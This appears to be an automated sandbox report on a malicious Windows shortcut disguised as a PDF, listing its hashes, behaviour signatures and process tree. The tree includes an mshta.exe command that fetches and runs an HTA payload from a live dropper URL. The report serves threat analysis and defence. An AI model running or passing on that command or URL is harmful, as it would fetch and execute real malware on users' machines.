Overview

overview

10

Static

static

Detailed D...df.lnk

windows7-x64

10

Detailed D...df.lnk

windows10-1703-x64

10

Analysis

  • max time kernel
    368s
  • max time network
    432s
  • platform
    windows10-1703_x64
  • resource
    win10-20220812-en
  • resource tags

    arch:x64arch:x86image:win10-20220812-enlocale:en-usos:windows10-1703-x64system
  • submitted
    20/10/2022, 19:36

Sharing

Copy URL Twitter E-mail
Report Analysis Logs

General

  • Target

    Detailed Documents with Anexures.pdf.lnk

  • Size

    1KB

  • MD5

    dfc7ee57c86d0eac5b31ce30a763b745

  • SHA1

    63a8b68ceab1bee92db181fd5a8c9c8f7797fa0d

  • SHA256

    500ae0f1ab40a254f81c73331c9848bada4c26adad613d53d339d14ca3599a32

  • SHA512

    b5e307cb61d448932ab51d17a9f6a25efada86b5af6a02a02571dde20d8e6ca0f4f8fa4aae98497fba642a1d5a2dae819411bb796d00a70c8004bb8205126eb7

Score
10/10

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

https://theboxart.xyz/auth/icvgOpijn/crises/

Signatures

  • Blocklisted process makes network request 5 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\Detailed Documents with Anexures.pdf.lnk"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2364
    • C:\Windows\System32\mshta.exe
      "C:\Windows\System32\mshta.exe" https://theboxart.xyz/auth/icvgOpijn/crises/
      2⤵
      • Blocklisted process makes network request
      PID:2712

Network

        MITRE ATT&CK Enterprise v6

        Replay Monitor

        Loading Replay Monitor...

        Downloads